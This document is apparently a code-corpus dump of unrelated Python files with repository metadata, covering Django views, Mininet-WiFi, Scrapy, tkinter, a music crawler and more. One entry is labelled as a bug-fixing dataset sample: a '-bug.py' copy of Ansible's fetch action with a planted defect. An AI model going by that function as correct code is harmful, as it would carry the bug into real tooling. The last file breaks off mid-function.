canvas.line((bx-bw,by-bw, bx+bw,by-bw, bx+bw,by+bw, bx-bw,by+bw, bx-bw,by-bw), fill="black")
# then a simple fx/fy line
fx, fy = event.action[0], event.action[1]
canvas.line((bx,by, bx+(fx*bw), by+(fy*bw)), fill="black")
# write it out
img = img.resize((200, 200))
filename = "%s/c%d/e%05d_r%d.png" % (dir, camera_id, event_id, state_id)
img.save(filename)
print >>sys.stderr, "read", total_num_read_episodes, "episodes for a total of", total_num_read_events, "events"
|
[
"[email protected]"
] | |
9c0f49814adb26d4b6bde24af40fb90845ccac80
|
d34da4a69ebef62d4b17b8b56f0eca72f0c021e4
|
/traffic_sign/subset_coco.py
|
4e117ea2e1cf5dff2b36cba086a24552a7c93498
|
[] |
no_license
|
gy20073/aws
|
91c193e18a15ab4d20acf9d58078bda791b39c38
|
1d73ce215026b1baa91a359628c26edeb59a22ce
|
refs/heads/master
| 2020-03-19T03:55:24.406320 | 2019-10-12T05:35:30 | 2019-10-12T05:35:30 | 135,775,172 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,296 |
py
|
import os
# for each label file, check whether stop sign in it.
# if do, then create new label file with only stop sign, in label dir, and add an entry of this image in the index file
subset="train2014"
label_path = "/scratch/yang/aws_data/coco/labels_bak/" + subset
out_path = "/scratch/yang/aws_data/coco/labels/" + subset
image_prefix = "/scratch/yang/aws_data/coco/images/" + subset
index_file = "/scratch/yang/aws_data/coco/filtered_" + subset + ".txt"
if not os.path.exists(out_path):
os.mkdir(out_path)
# 11 is stop sign
def filter_stop_sign(fname):
with open(fname, "r") as f:
lines = f.readlines()
out = []
for line in lines:
if line.startswith("11 "):
out.append("0 " + line[3:])
return out
def write_label(oname, filtered):
with open(oname, "w") as f:
for l in filtered:
f.write(l)
index = open(index_file, "w")
for file in os.listdir(label_path):
if file.endswith(".txt"):
filtered = filter_stop_sign(os.path.join(label_path, file))
if len(filtered) > 0:
# save the label
write_label(os.path.join(out_path, file), filtered)
# save the image name
index.write(os.path.join(image_prefix, file.replace(".txt", ".jpg")) + "\n")
index.close()
|
[
"[email protected]"
] | |
44b7e6b025a9917ce35e63a322c922264b4455b4
|
5922398212b6e113f416a54d37c2765d7d119bb0
|
/python/O(1) Check Power of 2.py
|
d664954d5d2b872362cab07d682b5469322e34d5
|
[] |
no_license
|
CrazyCoder4Carrot/lintcode
|
e777f73e1fdfe3b8abc9dbfc07d26602bf614151
|
33dcd7f0e2d9bee58840a3370837cb2db82de1eb
|
refs/heads/master
| 2021-01-09T20:38:59.813198 | 2017-01-16T22:34:26 | 2017-01-16T22:34:26 | 60,287,619 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 218 |
py
|
class Solution:
"""
@param n: An integer
@return: True or false
"""
def checkPowerOf2(self, n):
# write your code here
if n == 0:
return False
return n&(n-1) == 0
|
[
"[email protected]"
] | |
1b90c28e59e5d4a5998f4d6c2027b2eacdd7467f
|
1d9356626550004745bbc14de9a3308753afcea5
|
/sample/tests/while/led.py
|
2d6f9c7e92fa414d08993efca62d0115951efe0e
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
hoangt/veriloggen
|
e916290aa15c63f03ec0ad8e9c8bdf183787fbe9
|
8e7bd1ff664a6d683c3b7b31084ff4d961c4c841
|
refs/heads/master
| 2021-01-14T12:01:03.686270 | 2015-09-18T06:49:20 | 2015-09-18T06:49:20 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 806 |
py
|
import sys
import os
from veriloggen import *
def mkTest():
m = Module('test')
clk = m.Reg('CLK')
rst = m.Reg('RST')
count = m.Reg('count', width=32)
m.Initial(
Systask('dumpfile', 'uut.vcd'),
Systask('dumpvars', 0, clk, rst, count),
)
m.Initial(
clk(0),
Forever(clk(Not(clk), ldelay=5)) # forever #5 CLK = ~CLK;
)
m.Initial(
rst(0),
Delay(100),
rst(1),
Delay(100),
rst(0),
Delay(1000),
count(0),
While(count < 1024)(
count( count + 1 ),
Event(Posedge(clk))
),
Systask('finish'),
)
return m
if __name__ == '__main__':
test = mkTest()
verilog = test.to_verilog('tmp.v')
print(verilog)
|
[
"[email protected]"
] | |
3233cf987d1529f760bef548e7a959952c37b30f
|
98e1155518b292341e60908d12233a2b130cb043
|
/helpers.py
|
cabba2a794108cc9b151778f12f403862f7ef99b
|
[] |
no_license
|
bkj/pbtnet
|
5443a580e1bca91e4c293ae2be8bdefb85a44ce0
|
e8c7b11be92e5ff9e4facccf908e87611b7f72bb
|
refs/heads/master
| 2021-05-02T13:49:50.894351 | 2018-02-08T03:48:25 | 2018-02-08T03:48:25 | 120,707,510 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 644 |
py
|
#!/usr/bin/env python
"""
helpers.py
"""
from __future__ import print_function, division
import numpy as np
import torch
from torch import nn
from torch.autograd import Variable
def to_numpy(x):
if isinstance(x, Variable):
return to_numpy(x.data)
return x.cpu().numpy() if x.is_cuda else x.numpy()
def set_seeds(seed):
np.random.seed(seed)
_ = torch.manual_seed(seed + 123)
_ = torch.cuda.manual_seed(seed + 456)
class Flatten(nn.Module):
def forward(self, x):
return x.view(x.shape[0], -1)
def ablate(x, p):
return x * Variable(torch.rand((1,) + x.shape[1:]).cuda() > p).float()
|
[
"[email protected]"
] | |
ab4b58c9f57d81b86dab68de0f9e7f748fa7cce3
|
7680dbfce22b31835107403514f1489a8afcf3df
|
/Exercícios_parte_2/exercício__090.py
|
ee3ab125b849a111a10a421c0ee9807bb6c49dac
|
[] |
no_license
|
EstephanoBartenski/Aprendendo_Python
|
c0022d545af00c14e6778f6a80f666de31a7659e
|
69b4c2e07511a0bd91ac19df59aa9dafdf28fda3
|
refs/heads/master
| 2022-11-27T17:14:00.949163 | 2020-08-03T22:11:19 | 2020-08-03T22:11:19 | 284,564,300 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,083 |
py
|
# dicionários
print('--' * 17)
print(' CADASTRO DE NOTAS')
print('--' * 17)
aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input('Média de {}: '.format(aluno['nome'])))
print()
print(f' - O nome é {aluno["nome"]}.\n'
f' - A média é {aluno["med"]:.2f}.')
if aluno['med'] >= 7:
print(' - Situação: APROVADO!')
aluno['situação'] = 'aprovado'
elif 5 <= aluno['med'] < 7:
print(' - Situação: RECUPERAÇÃO!')
aluno['situação'] = 'recuperação'
else:
print(' - Situação: REPROVADO!')
aluno['situação'] = 'reprovado'
print()
print(aluno)
# outra resolução:
'''aluno = dict()
aluno['nome'] = str(input('Nome: ')).strip().capitalize()
aluno['med'] = float(input(f'Média de {aluno["nome"]} '))
if aluno['med'] >= 7:
aluno['situação'] = 'Aprovado'
elif 5 <= aluno['med'] < 7:
aluno['situação'] = 'Recuperação'
else:
aluno['situação'] = 'Reprovado'
print('--' * 30)
for k, v in aluno.items():
print(f' - {k} é igual a {v}')'''
|
[
"[email protected]"
] | |
4345f43ceebfae6bf9b4514241a243202d936d70
|
6d71de4e88dcb7d04f6d3a18736d393e12f8d087
|
/scripts/packages/mylistbox.py
|
27d62cd97b87fe9edbbcf35263ca9292f8eac3c9
|
[
"MIT"
] |
permissive
|
wyolum/Alex
|
71075c30691229e8eb28afa06a6ab44c450b14d4
|
03f1d8ae0107454d18964e33777ffc4c0c1a1951
|
refs/heads/main
| 2023-07-02T16:11:57.088323 | 2021-08-05T17:59:04 | 2021-08-05T17:59:04 | 338,686,528 | 10 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,551 |
py
|
#https://tk-tutorial.readthedocs.io/en/latest/listbox/listbox.html
import tkinter as tk
def listbox(parent, items, item_clicked, item_selected, n_row=40):
def myclick(event=None):
idx = lb.curselection()
if idx:
out = lb.get(idx)
search.delete(0, tk.END)
search.insert(0, out)
item_clicked(out)
def myselect(event):
myclick(event)
idx = lb.curselection()
out = lb.get(idx)
item_selected(out)
def search_changed(*args):
search_str = search_var.get()
i = 0
lb.delete(0, tk.END)
for item in items:
if search_str.lower() in item.lower():
lb.insert(i, item)
i += 1
frame = tk.Frame(parent)
search_var = tk.StringVar()
#search_var.trace('w', search_changed)
search = tk.Entry(frame, width=40, textvariable=search_var)
search.grid(row=1, column=0)
var = tk.StringVar(value=items)
lb = tk.Listbox(frame, listvariable=var, selectmode='single', height=n_row, width=40)
lb.grid(row=2, column=0)
lb.bind('<<ListboxSelect>>', myclick)
lb.bind('<Double-Button-1>', myselect)
frame.get = lb.get
frame.insert = lb.insert
frame.delete = lb.delete
frame.index = lb.index
return frame
def click(*args):
print('click', args)
def select(*args):
print('select', args)
if __name__ == '__main__':
root = tk.Tk()
frame = listbox(root, dir(tk), click, select)
frame.grid()
root.mainloop()
|
[
"[email protected]"
] | |
e2fdf25b7497cc5c1fcb0bf489b3eb9332e5bb62
|
5faa3f139f30c0d290e327e04e3fd96d61e2aabb
|
/mininet-wifi/SWITCHON-2015/allWirelessNetworksAroundUs.py
|
4e0c7e784e0db877764da170ac32d83db2baa977
|
[] |
no_license
|
hongyunnchen/reproducible-research
|
c6dfc3cd3c186b27ab4cf25949470b48d769325a
|
ed3a7a01b84ebc9bea96c5b02e0c97705cc2f7c6
|
refs/heads/master
| 2021-05-07T08:24:09.586976 | 2017-10-31T13:08:05 | 2017-10-31T13:08:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,525 |
py
|
#!/usr/bin/python
"""This example is based on this video: https://www.youtube.com/watch?v=_C4H2gBdyQY"""
from mininet.net import Mininet
from mininet.node import Controller, OVSKernelSwitch, OVSKernelAP
from mininet.link import TCLink
from mininet.cli import CLI
from mininet.log import setLogLevel
import os
def topology():
"Create a network."
net = Mininet( controller=Controller, link=TCLink, switch=OVSKernelSwitch, accessPoint=OVSKernelAP )
print "*** Creating nodes"
sta1 = net.addStation( 'sta1', wlans=2, ip='10.0.0.2/8', max_x=120, max_y=50, min_v=1.4, max_v=1.6 )
h1 = net.addHost( 'h1', mac='00:00:00:00:00:01', ip='10.0.0.1/8' )
ap1 = net.addAccessPoint( 'ap1', ssid='ssid_ap1', mode= 'g', channel=6, position='70,25,0' )
ap2 = net.addAccessPoint( 'ap2', ssid='ssid_ap2', mode= 'g', channel=1, position='30,25,0' )
ap3 = net.addAccessPoint( 'ap3', ssid='ssid_ap3', mode= 'g', channel=11, position='110,25,0' )
s4 = net.addSwitch( 's4', mac='00:00:00:00:00:10' )
c1 = net.addController( 'c1', controller=Controller )
print "*** Configuring wifi nodes"
net.configureWifiNodes()
print "*** Associating and Creating links"
net.addLink(ap1, s4)
net.addLink(ap2, s4)
net.addLink(ap3, s4)
net.addLink(s4, h1)
sta1.cmd('modprobe bonding mode=3')
sta1.cmd('ip link add bond0 type bond')
sta1.cmd('ip link set bond0 address 02:01:02:03:04:08')
sta1.cmd('ip link set sta1-wlan0 down')
sta1.cmd('ip link set sta1-wlan0 address 00:00:00:00:00:11')
sta1.cmd('ip link set sta1-wlan0 master bond0')
sta1.cmd('ip link set sta1-wlan1 down')
sta1.cmd('ip link set sta1-wlan1 address 00:00:00:00:00:12')
sta1.cmd('ip link set sta1-wlan1 master bond0')
sta1.cmd('ip addr add 10.0.0.10/8 dev bond0')
sta1.cmd('ip link set bond0 up')
'seed'
net.seed(12)
'plotting graph'
net.plotGraph(max_x=140, max_y=140)
"*** Available models: RandomWalk, TruncatedLevyWalk, RandomDirection, RandomWaypoint, GaussMarkov ***"
net.startMobility(startTime=0, model='RandomDirection')
print "*** Starting network"
net.build()
c1.start()
s4.start( [c1] )
ap1.start( [c1] )
ap2.start( [c1] )
ap3.start( [c1] )
sta1.cmd('ip addr del 10.0.0.2/8 dev sta1-wlan0')
os.system('ovs-ofctl add-flow s4 actions=normal')
print "*** Running CLI"
CLI( net )
print "*** Stopping network"
net.stop()
if __name__ == '__main__':
setLogLevel( 'info' )
topology()
|
[
"[email protected]"
] | |
fc10948d86708b6f47a13b0e303228135646e05a
|
e76f6fdb1a2ea89d4f38ac1ed28e50a7625e21b7
|
/qytdjg_learning/views/Form.py
|
f0c4967d53b2ea07c09c61e006a240cff2f1d5c2
|
[] |
no_license
|
collinsctk/qytdjg_learning
|
4d61a2a236f0bc4bf9be8d999352a8e3c1b87408
|
72a6d6153f6ca6bf9fccad76612450fdaf83d9fd
|
refs/heads/master
| 2020-03-24T19:45:31.145059 | 2018-07-31T06:51:14 | 2018-07-31T06:51:14 | 142,943,470 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,628 |
py
|
#!/usr/bin/env python3
# -*- coding=utf-8 -*-
# 本脚由亁颐堂现任明教教主编写,用于乾颐盾Python课程!
# 教主QQ:605658506
# 亁颐堂官网www.qytang.com
# 教主技术进化论拓展你的技术新边疆
# https://ke.qq.com/course/271956?tuin=24199d8a
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.shortcuts import render
# 表单
# 获取客户端请求的相关信息
def requestInfo(request):
result = 'path: %s ' % request.path
result = result + '<br>host: %s ' % request.get_host()
result = result + '<br>full_path %s ' % request.get_full_path()
result = result + '<br>port: %s ' % request.get_port()
result = result + '<br>https: %s ' % request.is_secure()
# request.META: Python字典, 包含所有HTTP请求头
try:
result = result + '<br>Accept: %s ' % request.META['HTTP_ACCEPT']
except KeyError:
result = result + '<br>HTTP请求头获取异常'
# 下面是展示META内部的键值
# values = request.META.items()
# sorted(values)
# html = []
# for key,value in values:
# html.append('<tr><td>%s</td><td>%s</td></tr>' % (key,value))
#
# return HttpResponse('<table>%s</table>' % '\n'.join(html))
return HttpResponse(result)
# 处理表单(Form)提交的数据
def searchForm(request):
return render_to_response('search_form.html')
# def search(request):
# if 'name' in request.GET:
# message = 'You searched for:%s' % request.GET['name']
# else:
# message = 'You submmited an empty form.'
# return HttpResponse(message)
# 从数据库查询数据
from mt.models import Movie
# def search(request):
# if 'name' in request.GET:
# name = request.GET['name']
# movies = Movie.objects.filter(type__icontains=name)
# return render_to_response('search_results.html', {'movies':movies, 'query':name})
# else:
# return HttpResponse('Pls submit a search term.')
# 改进表单
def search(request):
if 'name' in request.GET:
name = request.GET['name']
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext.html', {'movies':movies, 'query':name})
else:
return render_to_response('search_form_ext.html', {'error':True})
# 简单的表单校验
def searchVerify1(request):
error = False
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
error = True
elif len(name) > 10:
error = True
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify.html', {'error':True})
def searchVerify(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
# name必须有值
if not name:
errors.append('请输入电影类型名')
elif len(name) > 10:
errors.append('电影类型名长度不能大于10')
else:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verify2.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verify2.html', {'errors':errors})
# 复杂的表单校验
def searchVerifyad(request):
errors = []
if 'name' in request.GET:
name = request.GET['name']
value1 = request.GET['value1']
value2 = request.GET['value2']
# name必须有值
if not name:
errors.append('请输入电影类型名')
if not value1:
errors.append('必须提供value1')
if not value2:
errors.append('必须提供value2')
if not errors:
movies = Movie.objects.filter(type__icontains=name)
return render_to_response('search_form_ext_verifad.html', {'movies':movies, 'query':name})
return render_to_response('search_form_ext_verifyad.html', {'errors':errors})
# 编写Form类
# django.forms.Form
# 在视图中使用Form对象
from mt.forms import MyForm
# from django.views.decorators.csrf import csrf_exempt
# @csrf_exempt
# from django.views.decorators.csrf import csrf_protect
# from django.middleware.csrf import get_token
# @csrf_protect
# def contact(request):
# # print(get_token(request))
# if request.method == 'POST':
# form = MyForm(request.POST)
# if form.is_valid():
# print('完成与业务相关的工作')
# return HttpResponse('OK')
# else:
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# else:
# form = MyForm(initial={'name':'秦柯', 'email':'[email protected]', 'message':'没有信息'}) # 初始值
# return render_to_response('my_form.html',{'form':form, 'csrf_token':get_token(request)})
# 处理CSRF问题
def contact(request):
# print(get_token(request))
if request.method == 'POST':
form = MyForm(request.POST)
if form.is_valid():
print('完成与业务相关的工作')
return HttpResponse('OK')
else:
return render(request,'my_form.html',{'form':form})
else:
form = MyForm(initial={'name':'秦柯', 'email':'[email protected]', 'message':'没有信息'}) # 初始值
return render(request,'my_form.html',{'form':form})
if __name__ == "__main__":
pass
|
[
"[email protected]"
] | |
775c3d99a00861bd1974087e2fe75b1216b73fe6
|
421b0ae45f495110daec64ed98c31af525585c2c
|
/File_Handling/first_file.py
|
53c72b560b6263d87c4f8e3ce01570d86ad5fb4f
|
[] |
no_license
|
Pradeepsuthar/pythonCode
|
a2c87fb64c79edd11be54c2015f9413ddce246c4
|
14e2b397f69b3fbebde5b3af98898c4ff750c28c
|
refs/heads/master
| 2021-02-18T05:07:40.402466 | 2020-03-05T13:14:15 | 2020-03-05T13:14:15 | 245,163,673 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 528 |
py
|
# python provied function and methos to preform such as creating, reading, opening, closing etc.
# open file in python
# Syntax
# fileobject = open(file_name[,access_mode][,buffring])
# NOTE : Default access_mode is read
# Create/Open file in write mode
# fw = open("emp.txt","w")
# write data into file
# fw.write("324156\n")
# fw.write("Pradeep Suthar\n")
# fw.write(input("Enter mobile Number : "))
# fw.close()
print("Reading file\n")
fr = open("emp.txt")
data = fr.read()
fr.close()
print("\n",data)
|
[
"[email protected]"
] | |
aea70b7bae784283e27efb8fb4f2bc809628cb32
|
9bf62c04522b6b28e4d4bedd25654d0ea675f72a
|
/wechat_django/admin/views/menu.py
|
38ce85ed5fd22d128e4d83ff133787061ea61e5f
|
[
"MIT"
] |
permissive
|
x2x4com/wechat-django
|
9a46cd34c4a00f515e2e315d51d6475e509ad9f0
|
926e5d2ed2895d30a253504ff252a7a52fcfe81f
|
refs/heads/master
| 2020-05-20T02:31:08.735986 | 2019-05-01T16:03:31 | 2019-05-01T16:03:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,832 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django import forms
from django.contrib import messages
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
import object_tool
from wechatpy.exceptions import WeChatClientException
from ...models import Menu
from ..utils import get_request_params
from ..base import DynamicChoiceForm, WeChatModelAdmin
class MenuAdmin(WeChatModelAdmin):
__category__ = "menu"
__model__ = Menu
changelist_object_tools = ("sync", "publish")
change_form_template = "admin/wechat_django/menu/change_form.html"
change_list_template = "admin/wechat_django/menu/change_list.html"
list_display = (
"operates", "id", "parent_id", "title", "type", "detail", "weight",
"updated_at")
list_display_links = ("title",)
list_editable = ("weight", )
fields = (
"name", "type", "key", "url", "appid", "pagepath", "created_at",
"updated_at")
def title(self, obj):
if obj.parent:
return "|--- " + obj.name
return obj.name
title.short_description = _("title")
@mark_safe
def detail(self, obj):
rv = ""
if obj.type == Menu.Event.CLICK:
rv = obj.content.get("key")
elif obj.type == Menu.Event.VIEW:
rv = '<a href="{0}">{1}</a>'.format(
obj.content.get("url"), _("link"))
elif obj.type == Menu.Event.MINIPROGRAM:
rv = obj.content.get("appid")
return rv or ""
detail.short_description = _("detail")
@mark_safe
def operates(self, obj):
del_url = reverse("admin:wechat_django_menu_delete", kwargs=dict(
object_id=obj.id,
wechat_app_id=obj.app_id
))
rv = '<a class="deletelink" href="{0}"></a>'.format(del_url)
if not obj.parent and not obj.type and obj.sub_button.count() < 5:
query = dict(parent_id=obj.id)
add_link = reverse("admin:wechat_django_menu_add", kwargs=dict(
wechat_app_id=obj.app_id
))
add_url = "{0}?{1}".format(add_link, urlencode(query))
rv += '<a class="addlink" href="{0}"></a>'.format(add_url)
return rv
operates.short_description = _("actions")
@object_tool.confirm(short_description=_("Sync menus"))
def sync(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.sync(request.app)
return _("Menus successful synchronized")
return self._clientaction(
request, action, _("Sync menus failed with %(exc)s"))
@object_tool.confirm(short_description=_("Publish menus"))
def publish(self, request, obj=None):
self.check_wechat_permission(request, "sync")
def action():
Menu.publish(request.app)
return _("Menus successful published")
return self._clientaction(
request, action, _("Publish menus failed with %(exc)s"))
def get_actions(self, request):
actions = super(MenuAdmin, self).get_actions(request)
if "delete_selected" in actions:
del actions["delete_selected"]
return actions
def get_fields(self, request, obj=None):
fields = list(super(MenuAdmin, self).get_fields(request, obj))
if not obj:
fields.remove("created_at")
fields.remove("updated_at")
return fields
def get_readonly_fields(self, request, obj=None):
rv = super(MenuAdmin, self).get_readonly_fields(request, obj)
if obj:
rv = rv + ("created_at", "updated_at")
return rv
def get_queryset(self, request):
rv = super(MenuAdmin, self).get_queryset(request)
if not get_request_params(request, "menuid"):
rv = rv.filter(menuid__isnull=True)
if request.GET.get("parent_id"):
rv = rv.filter(parent_id=request.GET["parent_id"])
return rv
class MenuForm(DynamicChoiceForm):
content_field = "content"
origin_fields = ("name", "menuid", "type", "weight")
type_field = "type"
key = forms.CharField(label=_("menu key"), required=False)
url = forms.URLField(label=_("url"), required=False)
appid = forms.CharField(label=_("miniprogram app_id"), required=False)
pagepath = forms.CharField(label=_("pagepath"), required=False)
class Meta(object):
model = Menu
fields = ("name", "menuid", "type", "weight")
def allowed_fields(self, type, cleaned_data):
if type == Menu.Event.VIEW:
fields = ("url", )
elif type == Menu.Event.CLICK:
fields = ("key", )
elif type == Menu.Event.MINIPROGRAM:
fields = ("url", "appid", "apppath")
else:
fields = tuple()
return fields
form = MenuForm
def save_model(self, request, obj, form, change):
if not change and request.GET.get("parent_id"):
obj.parent_id = request.GET["parent_id"]
return super().save_model(request, obj, form, change)
def has_add_permission(self, request):
if not super(MenuAdmin, self).has_add_permission(request):
return False
# 判断菜单是否已满
q = self.get_queryset(request)
if request.GET.get("parent_id"):
return q.count() < 5
else:
return q.filter(parent_id__isnull=True).count() < 3
def get_model_perms(self, request):
return (super(MenuAdmin, self).get_model_perms(request)
if request.app.abilities.menus else {})
|
[
"[email protected]"
] | |
d6e214d0a8d4d12652eee9f7bca72966d79550f4
|
f9684c301ce50a6bbb5a75280cd4c70277119f27
|
/yelpdetails/yelpdetails/pipelines.py
|
55531cab7d87353200bd42058134f3e8878cb6be
|
[] |
no_license
|
vaibhav89000/yelpdetails
|
76149f2feed5cbad98b3e67d3a786223289fc1f4
|
b7ce6f739a7f76fbe665e27eb097475775c0c489
|
refs/heads/master
| 2022-11-25T05:09:56.803075 | 2020-07-06T12:45:54 | 2020-07-06T12:45:54 | 269,969,213 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,379 |
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import sqlite3
class YelpdetailsPipeline(object):
def __init__(self):
self.create_connection()
self.create_table()
def create_connection(self):
self.conn = sqlite3.connect("yelpdetails.db")
self.curr = self.conn.cursor()
def create_table(self):
self.curr.execute("""DROP TABLE IF EXISTS detail""")
self.curr.execute("""create table detail(
Name text,
website_link text,
website_name text,
phone text,
Direction text,
category text,
find text,
near text,
email text,
website text
)""")
# pass
def process_item(self, item, spider):
self.store_db(item)
return item
def store_db(self,item):
self.curr.execute("""insert into detail values (?,?,?,?,?,?,?,?,?,?)""",(
item['Name'],
item['website_link'],
item['website_name'],
item['phone'],
item['Direction'],
item['category'],
item['find'],
item['near'],
item['email'],
item['website']
))
self.conn.commit()
|
[
"[email protected]"
] | |
a927ca2edd90ae07adf56559bbfe6b40379ae5cb
|
f07a42f652f46106dee4749277d41c302e2b7406
|
/Data Set/bug-fixing-2/f57f33a8e73d1ac10b3eb6b4333e635c1608bc27-<run>-bug.py
|
8fd0e05b5b4b4ec324c3a6a1b7cf88dccfc0d38a
|
[] |
no_license
|
wsgan001/PyFPattern
|
e0fe06341cc5d51b3ad0fe29b84098d140ed54d1
|
cc347e32745f99c0cd95e79a18ddacc4574d7faa
|
refs/heads/main
| 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,670 |
py
|
def run(self, tmp=None, task_vars=None):
' handler for fetch operations '
if (task_vars is None):
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
if self._play_context.check_mode:
result['skipped'] = True
result['msg'] = 'check mode not (yet) supported for this module'
return result
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if (('validate_md5' in self._task.args) and ('validate_checksum' in self._task.args)):
result['failed'] = True
result['msg'] = 'validate_checksum and validate_md5 cannot both be specified'
return result
if ((source is None) or (dest is None)):
result['failed'] = True
result['msg'] = 'src and dest are required'
return result
source = self._connection._shell.join_path(source)
source = self._remote_expand_user(source)
remote_checksum = None
if (not self._play_context.become):
remote_checksum = self._remote_checksum(source, all_vars=task_vars)
remote_data = None
if (remote_checksum in ('1', '2', None)):
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('failed'):
if ((not fail_on_missing) and (slurpres.get('msg').startswith('file not found') or (remote_checksum == '1'))):
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
else:
result.update(slurpres)
return result
else:
if (slurpres['encoding'] == 'base64'):
remote_data = base64.b64decode(slurpres['content'])
if (remote_data is not None):
remote_checksum = checksum_s(remote_data)
remote_source = slurpres.get('source')
if (remote_source and (remote_source != source)):
source = remote_source
if (os.path.sep not in self._connection._shell.join_path('a', '')):
source = self._connection._shell._unquote(source)
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if (not dest.startswith('/')):
dest = self._loader.path_dwim(dest)
else:
if ('inventory_hostname' in task_vars):
target_name = task_vars['inventory_hostname']
else:
target_name = self._play_context.remote_addr
dest = ('%s/%s/%s' % (self._loader.path_dwim(dest), target_name, source_local))
dest = dest.replace('//', '/')
if (remote_checksum in ('0', '1', '2', '3', '4')):
if (remote_checksum == '0'):
result['msg'] = 'unable to calculate the checksum of the remote file'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '1'):
if fail_on_missing:
result['failed'] = True
result['msg'] = 'the remote file does not exist'
result['file'] = source
else:
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '2'):
result['msg'] = 'no read permission on remote file, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '3'):
result['msg'] = 'remote file is a directory, fetch cannot work on directories'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '4'):
result['msg'] = "python isn't present on the system. Unable to compute checksum"
result['file'] = source
result['changed'] = False
return result
local_checksum = checksum(dest)
if (remote_checksum != local_checksum):
makedirs_safe(os.path.dirname(dest))
if (remote_data is None):
self._connection.fetch_file(source, dest)
else:
try:
f = open(to_bytes(dest, errors='strict'), 'w')
f.write(remote_data)
f.close()
except (IOError, OSError) as e:
raise AnsibleError(('Failed to fetch the file: %s' % e))
new_checksum = secure_hash(dest)
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if (validate_checksum and (new_checksum != remote_checksum)):
result.update(dict(failed=True, md5sum=new_md5, msg='checksum mismatch', file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
result.update(dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
result.update(dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum))
return result
|
[
"[email protected]"
] | |
c3538eb3371b01aba72df474025a27cb07554102
|
bb160d2fc2c6182c4ca56c8e4635a14215f8c70f
|
/test_module/collector_test.py
|
d89697bcb6a78e55d06285541f3c33103c1160c4
|
[] |
no_license
|
bitacademy-howl/Music_Recommendation_mod
|
9464ed941ff722123457ba18cf35bccee3640b9b
|
94a430df1c65dc4b930f46ade4576bff95b6c27e
|
refs/heads/master
| 2020-03-27T15:18:21.725593 | 2018-11-05T08:55:45 | 2018-11-05T08:55:45 | 146,709,303 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,630 |
py
|
import datetime
import time
from bs4 import BeautifulSoup
import modules.collection.crawler as cw
from db_accessing import *
from db_accessing.VO import Music_VO, Artist_VO, Album_VO
from modules.collection.urlMaker import UrlMaker
class Collector:
def crawling_mnet_month_chart(url):
# crawling_from_chart
# mnet monthly chart 로부터 음원 데이터를 긁어오는 과정...
# VO 객체들
artistVO = Artist_VO()
albumVO = Album_VO()
musicVO = Music_VO()
html = cw.crawling(url=url)
bs = BeautifulSoup(html, 'html.parser')
#####################################################################################################################
# VO 값 입력
tag_music_list = bs.find('div', attrs={'class': 'MMLTable jQMMLTable'})
tag_tbody = tag_music_list.find('tbody')
tags_tr = tag_tbody.findAll('tr')
print("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++")
for tag_tr in tags_tr:
# item_title 태그내 정보들...
item_title_tag_td = tag_tr.find('td', attrs={'class': 'MMLItemTitle'})
# 8개 해야된다......
# 음원의 고유 아이디
